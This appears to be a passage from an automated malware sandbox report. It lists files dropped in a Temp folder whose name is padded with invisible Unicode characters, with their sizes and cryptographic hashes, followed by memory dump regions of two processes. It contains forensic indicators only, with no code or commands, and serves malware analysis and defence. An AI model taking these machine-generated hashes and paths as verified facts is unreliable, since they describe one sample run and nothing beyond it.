    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Downloads\LimitAssert.txt

      Filesize

      345KB

      MD5

      9e7912aa0fd11f489c78bbbfbbe4c28c

      SHA1

      b4e0102ab3526d0db20110774f703232fac69b8a

      SHA256

      518c0e7029d847cc6a74dbfad53fd95bc96b6cd39a3cd979b970e681aea45178

      SHA512

      cf70d0abf9c94937aed1e7fac993337600c12b8bea3380fbd39c576be1ccc4d98946570f61e8386d0623ff1e6cc90ac2cff2f5f6d1451ae5227e249273647246

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Downloads\LimitUnblock.png

      Filesize

      333KB

      MD5

      8118ab57efb40e1ccd8a8ff4e6e73df9

      SHA1

      ab5713912381004c5ad7a2c88d60666f583377b6

      SHA256

      232febdd96aec1e910fd5e2c74abd24d5a765d9474a6429e48666a7204149da1

      SHA512

      058d037ec4cf4b2835f126a0926081f8cc136b6829d0d549e8c11e09f6b271b2e36cc70a463156ce62e8320c6d53990b9506e92d8278440d8b461daa57361eb4

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Downloads\PushFormat.xls

      Filesize

      195KB

      MD5

      92a09961eaeaab6f97ea70c906e9c9fc

      SHA1

      29b080b4fc6321e59efaabe4b01d6b07f4731beb

      SHA256

      a08f5b369551dde3e87cfaf5d2f546c4277438d26caf5ce413cbf37770ce511e

      SHA512

      499fb7e2e95bf0c7c14037ca92d13b0cb767ca36b86e9efd4a6efd66f7f58a000026ff722425f5372ae9b4e0892c68474af524f2b8ea25d0620504455565378d

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Downloads\ResetLimit.txt

      Filesize

      771KB

      MD5

      5a02c2188acd42d5b024e6e88ac9a5d1

      SHA1

      06a4c2bae8613b2db65865cbace3d9d62b0c2656

      SHA256

      55696bd7cdc53defb5e097ae1b8aab00fbe71afec2241fb6b62c63434818ff09

      SHA512

      a2d067c1b4c1cc638a9d15e900c3c045b264ad6ecd9c4cbf3e129f728ab996d29428ee4cdc995447a38bc2afe8878cb9df755c719f0c6c5e8e11fc0373c3a657

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Downloads\UnregisterSave.xlsx

      Filesize

      449KB

      MD5

      9a0ee1e86676c5ee8bed2221ad0ed3c3

      SHA1

      02080d8b9ebbc0d64fb44f4933a6584f371cdf26

      SHA256

      b9f1cf4187f461a50190691ec9cb79fa1c50a2150ce5686ce64511b04c274b32

      SHA512

      1b655ca9f05abd46fecd01670b34008d11097cf14440e8ef8f983f243d303f8d03ba57f38a7605f62420cacfb65ebd3e811e908e4d11f926227faba442c7d134

    • C:\Users\Admin\AppData\Local\Temp\    ‎   ‎‏\Common Files\Music\CompressExpand.txt

      Filesize

      146KB

      MD5

      8c24a0cc48fa647bc3e1dbddf2057886

      SHA1

      1118588af1dc997ef370c0d233fc5773f5864ebe

      SHA256

      2166f6fb6360317a5a7fa2dc3e1e6f24b44cd1dca5f21410090a0f05747fdbf7

      SHA512

      b55c658618122c4780e88f98d017aa206f61b0f1251c499e5206bb895379342ff7b232f1e6eea0e9c84a365ca24ff2e94239f3fe7973e5e4fa957535219978ac

    • memory/1448-32-0x00007FF88B730000-0x00007FF88B73F000-memory.dmp

      Filesize

      60KB

    • memory/1448-77-0x00007FF886150000-0x00007FF886164000-memory.dmp

      Filesize

      80KB

    • memory/1448-248-0x00007FF8819F0000-0x00007FF881B6F000-memory.dmp

      Filesize

      1.5MB

    • memory/1448-72-0x00007FF885050000-0x00007FF88511E000-memory.dmp

      Filesize

      824KB

    • memory/1448-73-0x00007FF87E600000-0x00007FF87EB33000-memory.dmp

      Filesize

      5.2MB

    • memory/1448-74-0x000001B860080000-0x000001B8605B3000-memory.dmp

      Filesize

      5.2MB

    • memory/1448-69-0x00007FF881B70000-0x00007FF882232000-memory.dmp

      Filesize

      6.8MB

    • memory/1448-66-0x00007FF885120000-0x00007FF885153000-memory.dmp

      Filesize

      204KB

    • memory/1448-64-0x00007FF88B6F0000-0x00007FF88B6FD000-memory.dmp

      Filesize

      52KB

    • memory/1448-62-0x00007FF887470000-0x00007FF887489000-memory.dmp

      Filesize

      100KB

    • memory/1448-60-0x00007FF8819F0000-0x00007FF881B6F000-memory.dmp

      Filesize

      1.5MB

    • memory/1448-58-0x00007FF886170000-0x00007FF886194000-memory.dmp

      Filesize

      144KB

    • memory/1448-56-0x00007FF887530000-0x00007FF887549000-memory.dmp

      Filesize

      100KB

    • memory/1448-54-0x00007FF8861A0000-0x00007FF8861CC000-memory.dmp

      Filesize

      176KB

    • memory/1448-31-0x00007FF88B690000-0x00007FF88B6B5000-memory.dmp

      Filesize

      148KB

    • memory/1448-177-0x00007FF886170000-0x00007FF886194000-memory.dmp

      Filesize

      144KB

    • memory/1448-25-0x00007FF881B70000-0x00007FF882232000-memory.dmp

      Filesize

      6.8MB

    • memory/1448-79-0x00007FF8861A0000-0x00007FF8861CC000-memory.dmp

      Filesize

      176KB

    • memory/1448-78-0x00007FF8852E0000-0x00007FF8852ED000-memory.dmp

      Filesize

      52KB

    • memory/1448-81-0x00007FF8818D0000-0x00007FF8819EA000-memory.dmp

      Filesize

      1.1MB

    • memory/1448-71-0x00007FF88B690000-0x00007FF88B6B5000-memory.dmp

      Filesize

      148KB

    • memory/1448-307-0x00007FF8852E0000-0x00007FF8852ED000-memory.dmp

      Filesize

      52KB

    • memory/1448-286-0x00007FF885120000-0x00007FF885153000-memory.dmp

      Filesize

      204KB

    • memory/1448-287-0x00007FF885050000-0x00007FF88511E000-memory.dmp

      Filesize

      824KB

    • memory/1448-288-0x000001B860080000-0x000001B8605B3000-memory.dmp

      Filesize

      5.2MB

    • memory/1448-289-0x00007FF87E600000-0x00007FF87EB33000-memory.dmp

      Filesize

      5.2MB

    • memory/1448-304-0x00007FF8818D0000-0x00007FF8819EA000-memory.dmp

      Filesize

      1.1MB

    • memory/1448-291-0x00007FF88B690000-0x00007FF88B6B5000-memory.dmp

      Filesize

      148KB

    • memory/1448-315-0x00007FF885050000-0x00007FF88511E000-memory.dmp

      Filesize

      824KB

    • memory/1448-314-0x00007FF885120000-0x00007FF885153000-memory.dmp

      Filesize

      204KB

    • memory/1448-313-0x00007FF88B6F0000-0x00007FF88B6FD000-memory.dmp

      Filesize

      52KB

    • memory/1448-312-0x00007FF887470000-0x00007FF887489000-memory.dmp

      Filesize

      100KB

    • memory/1448-311-0x00007FF8819F0000-0x00007FF881B6F000-memory.dmp

      Filesize

      1.5MB

    • memory/1448-310-0x00007FF886170000-0x00007FF886194000-memory.dmp

      Filesize

      144KB

    • memory/1448-309-0x00007FF887530000-0x00007FF887549000-memory.dmp

      Filesize

      100KB

    • memory/1448-308-0x00007FF8861A0000-0x00007FF8861CC000-memory.dmp

      Filesize

      176KB

    • memory/5060-90-0x00000198EF6C0000-0x00000198EF6E2000-memory.dmp

      Filesize

      136KB